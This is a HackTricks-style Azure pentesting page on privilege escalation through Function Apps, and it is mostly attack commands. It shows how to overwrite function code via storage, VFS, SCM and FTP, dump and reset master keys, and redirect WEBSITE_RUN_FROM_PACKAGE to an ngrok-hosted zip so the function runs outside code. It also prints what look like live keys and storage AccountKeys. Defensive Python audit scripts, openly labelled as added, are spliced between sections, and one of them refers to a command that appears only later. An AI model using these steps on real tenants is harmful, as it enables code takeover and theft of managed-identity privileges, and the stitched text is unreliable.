Az - Functions App Privesc

Reading time: 15 minutes

tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Function Apps

Check the following page for more information:

Az - Function Apps

Bucket Read/Write

With read permissions over the containers inside the Storage Account that stores the function's data, it is possible to find different containers (default or custom-named) that may hold the code executed by the function.

Once you locate where the function's code is stored, if you have write permissions over it, you can make the function execute arbitrary code and escalate privileges to the managed identity attached to that function.

  • File Share (WEBSITE_CONTENTAZUREFILECONNECTIONSTRING and WEBSITE_CONTENTSHARE)

The function's code is usually stored inside a file share. With enough access, it is possible to modify the code file and make the function load arbitrary code, allowing privilege escalation to the managed identity attached to the Function.

This execution method usually sets the WEBSITE_CONTENTAZUREFILECONNECTIONSTRING and WEBSITE_CONTENTSHARE settings, which you can obtain with:

```bash
az functionapp config appsettings list \
--name <app-name> \
--resource-group <res-group>
```

Those settings contain the Storage Account Key the Function uses to access the code.

caution

With enough permissions to connect to the File Share and modify the script in use, it is possible to execute arbitrary code in the Function and escalate privileges.

The following example uses macOS to connect to the file share, but it is also recommended to check the following page for more information about file shares:

Az - File Shares

```bash
# Username is the name of the storage account
# Password is the Storage Account Key

# Open the connection to the file share
# Change the code of the script like /site/wwwroot/function_app.py

open "smb://<STORAGE-ACCOUNT>.file.core.windows.net/<FILE-SHARE-NAME>"
```

  • function-releases (WEBSITE_RUN_FROM_PACKAGE)

It is also common to find the zip releases used by the function app in the Storage Account, inside a container that is usually called function-releases.

By default, this execution method sets the WEBSITE_RUN_FROM_PACKAGE setting, which can be seen in:

```bash
az functionapp config appsettings list \
--name <app-name> \
--resource-group <res-group>
```

This setting usually contains a SAS URL to download the code from the Storage Account.

caution

With enough permissions to connect to the blob container holding the code zip, it is possible to execute arbitrary code in the Function and escalate privileges.

  • github-actions-deploy (WEBSITE_RUN_FROM_PACKAGE)

As in the previous case, if the deployment is done via Github Actions it is possible to find the github-actions-deploy folder in the Storage Account holding the code zip, and a SAS URL to that zip in the WEBSITE_RUN_FROM_PACKAGE setting.

  • scm-releases (WEBSITE_CONTENTAZUREFILECONNECTIONSTRING and WEBSITE_CONTENTSHARE)

With read permissions over the containers inside the Storage Account that stores the function's data, it is possible to find the scm-releases container. Inside it, the latest release is stored in the Squashfs filesystem file format, so the function's code can be read:

```bash
# List containers inside the storage account of the function app
az storage container list \
--account-name <acc-name> \
--output table

# List files inside one container
az storage blob list \
--account-name <acc-name> \
--container-name <container-name> \
--output table

# Download file
az storage blob download \
--account-name <acc-name> \
--container-name scm-releases \
--name scm-latest-<app-name>.zip \
--file /tmp/scm-latest-<app-name>.zip

## Even if it looks like the file is a .zip, it's a Squashfs filesystem

# Install
brew install squashfs

# List contents of the filesystem
unsquashfs -l "/tmp/scm-latest-<app-name>.zip"

# Get all the contents
mkdir /tmp/fs
unsquashfs -d /tmp/fs /tmp/scm-latest-<app-name>.zip
```
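The ".zip" that is really a squashfs image is easy to misread during triage, so the following Python (an added example, not code from the original page nor from any Azure tooling) checks the magic bytes of a downloaded scm-releases blob and decodes the squashfs superblock fields that matter (version, block size, compressor) before anything is extracted. The 32-byte header it builds for offline use is constructed, not a real release.

```python
import struct
import sys

# Magic values: squashfs superblocks start with the ASCII bytes "hsqs"
# (0x73717368 little-endian); zip archives start with "PK\x03\x04".
SQUASHFS_MAGIC = b"hsqs"
ZIP_MAGIC = b"PK\x03\x04"

# Compression ids defined by the squashfs superblock format.
SQUASHFS_COMPRESSORS = {1: "gzip", 2: "lzma", 3: "lzo", 4: "xz", 5: "lz4", 6: "zstd"}


def identify_release_blob(data: bytes) -> dict:
    """Identify what a downloaded scm-releases blob really is from its first bytes.

    Returns {'format': 'zip'} for a real zip, {'format': 'unknown'} for anything
    unrecognised, and for squashfs the superblock fields useful for triage.
    """
    if data[:4] == ZIP_MAGIC:
        return {"format": "zip"}
    if data[:4] != SQUASHFS_MAGIC or len(data) < 32:
        return {"format": "unknown"}
    # Superblock layout after the magic: u32 inode_count, u32 mod_time, u32 block_size,
    # u32 frag_count, then u16 compressor, block_log, flags, id_count, ver_major, ver_minor.
    (inode_count, _mod_time, block_size, _frag_count, compressor, block_log,
     _flags, _id_count, ver_major, ver_minor) = struct.unpack_from("<IIIIHHHHHH", data, 4)
    return {
        "format": "squashfs",
        "version": f"{ver_major}.{ver_minor}",
        "inode_count": inode_count,
        "block_size": block_size,
        "block_log": block_log,
        # block_size must equal 2**block_log; a mismatch means a corrupt or forged header
        "header_consistent": (1 << block_log) == block_size,
        "compressor": SQUASHFS_COMPRESSORS.get(compressor, f"unknown({compressor})"),
    }


def identify_release_file(path: str) -> dict:
    """Read only the header of a file on disk and classify it."""
    with open(path, "rb") as fh:
        return identify_release_blob(fh.read(96))


def sample_squashfs_header() -> bytes:
    """Constructed 32-byte squashfs superblock prefix (not a real release):
    42 inodes, 128 KiB blocks (block_log 17, the mksquashfs -b 131072 used above), xz, v4.0."""
    return struct.pack("<4sIIIIHHHHHH", SQUASHFS_MAGIC, 42, 0, 131072, 0, 4, 17, 0, 1, 4, 0)


if __name__ == "__main__":
    # Usage: python3 identify_release.py /tmp/scm-latest-<app-name>.zip
    target = sys.argv[1] if len(sys.argv) > 1 else None
    print(identify_release_file(target) if target else identify_release_blob(sample_squashfs_header()))
```

Running it on a real download tells you whether unsquashfs or unzip is the right tool, and the header_consistent flag is a cheap sanity check that the file is a well-formed image rather than something masquerading as one.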

It is also possible to find the master and function keys stored in the storage account, in the azure-webjobs-secrets container inside the <app-name> folder, in the JSON files located there.

caution

With enough permissions to connect to the blob container holding the code in the zip-extension file (which is actually a squashfs), it is possible to execute arbitrary code in the Function and escalate privileges.

```bash
# Modify code inside the script in /tmp/fs adding your code

# Generate new filesystem file
mksquashfs /tmp/fs /tmp/scm-latest-<app-name>.zip  -b 131072 -noappend

# Upload it to the blob storage
az storage blob upload \
--account-name <storage-account> \
--container-name scm-releases \
--name scm-latest-<app-name>.zip \
--file /tmp/scm-latest-<app-name>.zip \
--overwrite
```

Microsoft.Web/sites/host/listkeys/action

This permission allows listing the function, master and system keys, but not the host keys, of the specified function with:

```bash
az functionapp keys list --resource-group <res_group> --name <func-name>
```

With the master key it is also possible to obtain the source code at a URL like:

```bash
# Get "script_href" from
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions?api-version=2024-04-01"

# Access
curl "<script-href>?code=<master-key>"
## Python example:
curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g==" -v
```

And modify the code executed in the function with:

```bash
# Set the code to set in the function in /tmp/function_app.py
## The following continues using the python example
curl -X PUT "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g==" \
--data-binary @/tmp/function_app.py \
-H "Content-Type: application/json" \
-H "If-Match: *" \
-v
```

Microsoft.Web/sites/functions/listKeys/action

This permission allows obtaining the host keys of the specified function with:

```bash
az rest --method POST --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.Web/sites/<func-name>/functions/<func-endpoint-name>/listKeys?api-version=2022-03-01"
```

Microsoft.Web/sites/host/functionKeys/write

This permission allows creating/updating the function keys of the specified function with:

```bash
az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type functionKeys --name <func-name> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
```

Microsoft.Web/sites/host/masterKey/write

This permission allows creating/updating the master key of the specified function with:

```bash
az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-name> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
```

caution

Remember that with this key you can also access the source code and modify it as explained before!

Microsoft.Web/sites/host/systemKeys/write

This permission allows creating/updating the system keys of the specified function with:

```bash
az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type systemKeys --name <func-name> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
```

Microsoft.Web/sites/config/list/action

This permission allows obtaining the function's settings. Among these settings it may be possible to find the base values AzureWebJobsStorage or WEBSITE_CONTENTAZUREFILECONNECTIONSTRING, which contain account keys to access the function's blob storage with FULL permissions.

```bash
az functionapp config appsettings list --name <func-name> --resource-group <res-group>
```

Moreover, this permission also allows obtaining the SCM username and password (if enabled) with:

```bash
az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/publishingcredentials/list?api-version=2018-11-01"
```

Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/write

These permissions allow listing the function's config values, as seen before, and also modifying them. This is useful because these settings indicate where the code to be executed inside the function is located.

Therefore, it is possible to set the WEBSITE_RUN_FROM_PACKAGE setting pointing to the URL of a zip file holding the new code to execute inside the web app:

  • Start by getting the current config

```bash
az functionapp config appsettings list \
--name <app-name> \
--resource-group <res-name>
```

  • Create the code you want the function to run and expose it publicly

```bash
# Write inside /tmp/web/function_app.py the code of the function
cd /tmp/web
zip function_app.zip function_app.py
python3 -m http.server

# Serve it using ngrok for example
ngrok http 8000
```

  • Modify the function: keep the previous parameters and append the WEBSITE_RUN_FROM_PACKAGE setting pointing to the URL with the zip holding the code.

The following example is from my own setup; you need to change the values to yours. Note the final value "WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip", this is where I was hosting the app.

```bash
# Modify the function
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Web/sites/newfunctiontestlatestrelease/config/appsettings?api-version=2023-01-01" \
--headers '{"Content-Type": "application/json"}' \
--body '{"properties": {"APPLICATIONINSIGHTS_CONNECTION_STRING": "InstrumentationKey=67b64ab1-a49e-4e37-9c42-ff16e07290b0;IngestionEndpoint=https://canadacentral-1.in.applicationinsights.azure.com/;LiveEndpoint=https://canadacentral.livediagnostics.monitor.azure.com/;ApplicationId=cdd211a7-9981-47e8-b3c7-44cd55d53161", "AzureWebJobsStorage": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net", "FUNCTIONS_EXTENSION_VERSION": "~4", "FUNCTIONS_WORKER_RUNTIME": "python", "WEBSITE_CONTENTAZUREFILECONNECTIONSTRING": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net","WEBSITE_CONTENTSHARE": "newfunctiontestlatestrelease89c1", "WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"}}'
```
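The settings discussed in this section and in the Bucket Read/Write section above (AzureWebJobsStorage, WEBSITE_CONTENTAZUREFILECONNECTIONSTRING, WEBSITE_CONTENTSHARE and WEBSITE_RUN_FROM_PACKAGE, plus the AzureWebJobs.<function>.Disabled flags used further down) are exactly what a reviewer of an app's configuration wants to surface. The following Python is an added example, not code from the original page nor from Azure's tooling: it parses the JSON printed by az functionapp config appsettings list, redacts the account keys, and classifies where WEBSITE_RUN_FROM_PACKAGE points, flagging a package fetched from a host outside Azure blob storage (the tunnelled URL pattern shown above). The sample settings, account name, key and package host are constructed placeholders, and the .blob.core.windows.net suffix used to decide whether a package is Azure-hosted is an assumption.

```python
import json
from urllib.parse import parse_qs, urlparse

# Settings whose value is a storage connection string carrying an AccountKey,
# i.e. full control of the storage account that holds the function's code.
STORAGE_CONNECTION_SETTINGS = ("AzureWebJobsStorage", "WEBSITE_CONTENTAZUREFILECONNECTIONSTRING")
# Host suffix a package URL is expected to use when Azure itself hosts the package
# (assumption for this example; adjust for sovereign clouds).
AZURE_BLOB_SUFFIX = ".blob.core.windows.net"


def parse_connection_string(value: str) -> dict:
    """Split 'Key=Value;Key=Value' into a dict. Only the first '=' separates key from
    value, because base64 account keys end with '=' padding."""
    fields = {}
    for part in value.split(";"):
        if part:
            key, _, val = part.partition("=")
            fields[key] = val
    return fields


def redact(secret: str, keep: int = 4) -> str:
    """Keep a short prefix so findings can be correlated without copying the key around."""
    return secret[:keep] + "..." if len(secret) > keep else "..."


def classify_package_url(value: str) -> str:
    """Classify a WEBSITE_RUN_FROM_PACKAGE value: '1' runs the package already in the
    file share; otherwise it is a URL, normally an Azure blob SAS URL (has a 'sig'
    query parameter). Any other host means the code is fetched from outside Azure."""
    if value.strip() == "1":
        return "local-package"
    url = urlparse(value)
    if url.scheme not in ("https", "http"):
        return "unrecognised"
    host = (url.hostname or "").lower()
    if not host.endswith(AZURE_BLOB_SUFFIX):
        return "external-url"
    return "azure-sas-url" if "sig" in parse_qs(url.query) else "azure-url"


def audit_app_settings(settings: list) -> list:
    """settings: list of {'name', 'value', 'slotSetting'} objects as printed by
    `az functionapp config appsettings list`. Returns one finding dict per setting
    that locates the code or unlocks the storage behind it."""
    findings = []
    for s in settings:
        name, value = s.get("name", ""), s.get("value") or ""
        if name in STORAGE_CONNECTION_SETTINGS:
            cs = parse_connection_string(value)
            if "AccountKey" in cs:
                findings.append({"setting": name, "kind": "storage-account-key",
                                 "account": cs.get("AccountName"), "key": redact(cs["AccountKey"])})
        elif name == "WEBSITE_CONTENTSHARE":
            findings.append({"setting": name, "kind": "code-file-share", "share": value})
        elif name == "WEBSITE_RUN_FROM_PACKAGE":
            findings.append({"setting": name, "kind": classify_package_url(value), "url": value})
        elif name.startswith("AzureWebJobs.") and name.endswith(".Disabled"):
            func = name[len("AzureWebJobs."):-len(".Disabled")]
            findings.append({"setting": name, "kind": "function-disabled-flag",
                             "function": func, "disabled": value.lower() in ("true", "1")})
    return findings


# Constructed sample in the shape of `az functionapp config appsettings list` output.
# Account name, key and package host are placeholders, not real values.
SAMPLE_SETTINGS = [
    {"name": "FUNCTIONS_WORKER_RUNTIME", "value": "python", "slotSetting": False},
    {"name": "AzureWebJobsStorage",
     "value": "DefaultEndpointsProtocol=https;AccountName=examplefuncstorage;"
              "AccountKey=EXAMPLEKEYNOTREAL0000000000==;EndpointSuffix=core.windows.net",
     "slotSetting": False},
    {"name": "WEBSITE_CONTENTAZUREFILECONNECTIONSTRING",
     "value": "DefaultEndpointsProtocol=https;AccountName=examplefuncstorage;"
              "AccountKey=EXAMPLEKEYNOTREAL0000000000==;EndpointSuffix=core.windows.net",
     "slotSetting": False},
    {"name": "WEBSITE_CONTENTSHARE", "value": "examplefunc1234", "slotSetting": False},
    {"name": "WEBSITE_RUN_FROM_PACKAGE",
     "value": "https://example-tunnel-host.invalid/function_app.zip", "slotSetting": False},
    {"name": "AzureWebJobs.http_trigger1.Disabled", "value": "false", "slotSetting": False},
]


if __name__ == "__main__":
    # Feed real output with: az functionapp config appsettings list ... -o json | python3 audit.py
    for finding in audit_app_settings(SAMPLE_SETTINGS):
        print(json.dumps(finding))
```

An external-url finding on WEBSITE_RUN_FROM_PACKAGE is the signal that matters here: the app is pulling its code from somewhere its operators do not control, which is exactly the state the config/write path above leaves behind.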

Microsoft.Web/sites/hostruntime/vfs/write

With this permission it is possible to modify the app's code via the web console (or via this API endpoint):

```bash
# This is a python example, so we will be overwriting function_app.py
# Store in /tmp/body the raw python code to put in the function
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" \
--headers '{"Content-Type": "application/json", "If-Match": "*"}' \
--body @/tmp/body
```

Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write)

These permissions allow listing all the publishing profiles, which basically include basic auth credentials:

```bash
# Get creds
az functionapp deployment list-publishing-profiles \
--name <app-name> \
--resource-group <res-name> \
--output json
```

Another option would be to set your own credentials and use them with:

```bash
az functionapp deployment user set \
--user-name DeployUser123456 \
--password 'P@ssw0rd123!'
```

  • If the credentials are REDACTED

If you see that those credentials are REDACTED, it is because you need to enable the SCM basic authentication option, and therefore you need the second permission (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):

```bash
# Enable basic authentication for SCM
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'

# Enable basic authentication for FTP
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'
```

  • SCM method

Then, with these basic auth credentials you can access the SCM URL of your function app and obtain the values of the environment variables:

```bash
# Get settings values
curl -u '<username>:<password>' \
https://<app-name>.scm.azurewebsites.net/api/settings -v

# Deploy code to the function
zip function_app.zip function_app.py # Your code in function_app.py
curl -u '<username>:<password>' -X POST --data-binary "@<zip_file_path>" \
https://<app-name>.scm.azurewebsites.net/api/zipdeploy
```

Note that the SCM username is usually the character "$" followed by the name of the app, so: $<app-name>.

You can also access the web page at https://<app-name>.scm.azurewebsites.net/BasicAuth

The settings values include the AccountKey of the storage account that stores the function app's data, allowing control over that storage account.

  • Method FTP

Connect to the FTP server using:

```bash
# macOS install lftp
brew install lftp

# Connect using lftp
lftp -u '<username>','<password>' \
ftps://waws-prod-yq1-005dr.ftp.azurewebsites.windows.net/site/wwwroot/

# Some commands
ls # List
get ./function_app.py -o /tmp/ # Download function_app.py in /tmp
put /tmp/function_app.py -o /site/wwwroot/function_app.py # Upload file and deploy it
```

Note that the FTP username is usually in the format <app-name>\$<app-name>.

Microsoft.Web/sites/hostruntime/vfs/read

This permission allows reading the app's source code via the VFS:

```bash
az rest --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
```

Microsoft.Web/sites/functions/token/action

With this permission it is possible to obtain an admin token that can later be used to get the master key and thus access and modify the function's code.

However, in my last check no token was returned, so it may have been disabled or no longer work, but here is how you could do it:

```bash
# Get admin token
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions/admin/token?api-version=2024-04-01"

# Get master key
curl "https://<app-name>.azurewebsites.net/admin/host/systemkeys/_master" \
-H "Authorization: Bearer <token>"
```

Microsoft.Web/sites/config/write, (Microsoft.Web/sites/functions/properties/read)

These permissions allow enabling functions that may be disabled (or disabling them).

```bash
# Enable a disabled function
az functionapp config appsettings set \
--name <app-name> \
--resource-group <res-group> \
--settings "AzureWebJobs.http_trigger1.Disabled=false"
```

It is also possible to see whether a function is enabled or disabled at the following URL (using the permission in parentheses):

```bash
az rest --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions/<func-name>/properties/state?api-version=2024-04-01"
```

Microsoft.Web/sites/config/write, Microsoft.Web/sites/config/list/action, (Microsoft.Web/sites/read, Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/read)

With these permissions it is possible to change the container used by a function app configured to run from a container. This would allow an attacker to upload a malicious azure function container image to docker hub (for example) and make the function run it.

```bash
az functionapp config container set --name <app-name> \
--resource-group <res-group> \
--image "mcr.microsoft.com/azure-functions/dotnet8-quickstart-demo:1.0"
```

Microsoft.Web/sites/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action, Microsoft.App/managedEnvironments/join/action, (Microsoft.Web/sites/read, Microsoft.Web/sites/operationresults/read)

With these permissions it is possible to attach a user managed identity to a function. If the function is compromised, this allows escalating privileges to any user managed identity.

```bash
az functionapp identity assign \
--name <app-name> \
--resource-group <res-group> \
--identities /subscriptions/<subs-id>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<mi-name>
```

Remote Debugging

It is possible to connect to and debug a running Azure function as explained in the docs. However, by default Azure disables this option after 2 days if the developer forgets to, to avoid leaving a vulnerable configuration behind.

It is possible to check whether a Function has debugging enabled with:

```bash
az functionapp show --name <app-name> --resource-group <res-group>
```

With the Microsoft.Web/sites/config/write permission it is also possible to put the function in debugging mode (the following command also requires the permissions Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/Read and Microsoft.Web/sites/Read).

```bash
az functionapp config set --remote-debugging-enabled=True --name <app-name> --resource-group <res-group>
```
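Remote debugging, the basic publishing credential policies and the publishing profiles from the previous sections are three views of the same exposure, and the REDACTED-versus-live state of a profile should agree with the policy. The following Python is an added example (not code from the original page nor from Azure's tooling) that takes the JSON of those three commands and reports the findings together; the field names it reads (remoteDebuggingEnabled, remoteDebuggingVersion and ftpsState from az functionapp config show; publishMethod, userName and userPWD from list-publishing-profiles) are assumptions about the CLI output, and the app name, version and hosts in the sample data are constructed placeholders.

```python
import json

REDACTED = "REDACTED"


def _policy_allows(policy: dict) -> bool:
    """basicPublishingCredentialsPolicies/{scm,ftp} body: {"properties": {"allow": bool}}."""
    return bool((policy or {}).get("properties", {}).get("allow"))


def expected_publish_user(app_name: str, publish_method: str) -> str:
    """Username convention from the text above: FTP profiles use '<app>\\$<app>',
    the other profiles use '$<app>'."""
    return f"{app_name}\\${app_name}" if publish_method == "FTP" else f"${app_name}"


def audit_publishing_exposure(app_name, site_config, policies, profiles):
    """site_config: dict from `az functionapp config show` (assumed keys remoteDebuggingEnabled,
    remoteDebuggingVersion, ftpsState); policies: {'scm': ..., 'ftp': ...} bodies from the
    basicPublishingCredentialsPolicies endpoints; profiles: list from
    `az functionapp deployment list-publishing-profiles` (assumed keys publishMethod,
    userName, userPWD). Returns a list of finding dicts."""
    findings = []
    if site_config.get("remoteDebuggingEnabled"):
        version = site_config.get("remoteDebuggingVersion") or "unknown"
        findings.append({"check": "remote-debugging", "detail": f"enabled, version {version}"})
    if site_config.get("ftpsState") == "AllAllowed":
        findings.append({"check": "plain-ftp-allowed", "detail": "ftpsState=AllAllowed"})
    for label in ("scm", "ftp"):
        if _policy_allows(policies.get(label)):
            findings.append({"check": f"basic-auth-{label}", "detail": "allow=true"})
    for p in profiles:
        method, user, pwd = p.get("publishMethod", ""), p.get("userName", ""), p.get("userPWD", "")
        live = bool(pwd) and pwd != REDACTED
        findings.append({"check": "publishing-profile", "method": method, "user": user,
                         "credential": "live" if live else "redacted",
                         "user_matches_convention": user == expected_publish_user(app_name, method)})
    # Live passwords while both policies deny basic auth (or the reverse) means the
    # two views disagree, e.g. captured at different times; flag it for a re-check.
    any_live = any(f.get("credential") == "live" for f in findings)
    any_allow = any(f["check"].startswith("basic-auth-") for f in findings)
    if profiles and any_live != any_allow:
        findings.append({"check": "policy-profile-mismatch",
                         "detail": f"live credentials={any_live}, basic auth allowed={any_allow}"})
    return findings


# Constructed sample data; app name, version and hosts are placeholders.
SAMPLE_APP = "examplefunc"
SAMPLE_SITE_CONFIG = {"remoteDebuggingEnabled": True, "remoteDebuggingVersion": "VS2022",
                      "ftpsState": "FtpsOnly"}
SAMPLE_POLICIES = {"scm": {"properties": {"allow": False}}, "ftp": {"properties": {"allow": False}}}
SAMPLE_PROFILES = [
    {"publishMethod": "MSDeploy", "userName": "$examplefunc", "userPWD": REDACTED,
     "publishUrl": "examplefunc.scm.azurewebsites.net:443"},
    {"publishMethod": "FTP", "userName": "examplefunc\\$examplefunc", "userPWD": REDACTED,
     "publishUrl": "ftps://waws-prod-example.ftp.azurewebsites.windows.net/site/wwwroot"},
]


if __name__ == "__main__":
    for finding in audit_publishing_exposure(SAMPLE_APP, SAMPLE_SITE_CONFIG, SAMPLE_POLICIES, SAMPLE_PROFILES):
        print(json.dumps(finding))
```

Because remote debugging is auto-disabled after the 2-day window mentioned above, a remote-debugging finding on an app nobody is actively working on is worth correlating with the activity log to see who turned it on and when.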

Badilisha Github repo

I tried to change the Github repo the deployment is done from by executing the following commands, but even though it changed, the new code wasn't loaded (probably because it expects a Github Action to update the code).
Moreover, the federated managed identity wasn't modified to allow the new repository, so it seems this isn't very useful.

```bash
# Remove current
az functionapp deployment source delete \
--name funcGithub \
--resource-group Resource_Group_1

# Load new public repo
az functionapp deployment source config \
--name funcGithub \
--resource-group Resource_Group_1 \
--repo-url "https://github.com/orgname/azure_func3" \
--branch main --github-action true
```
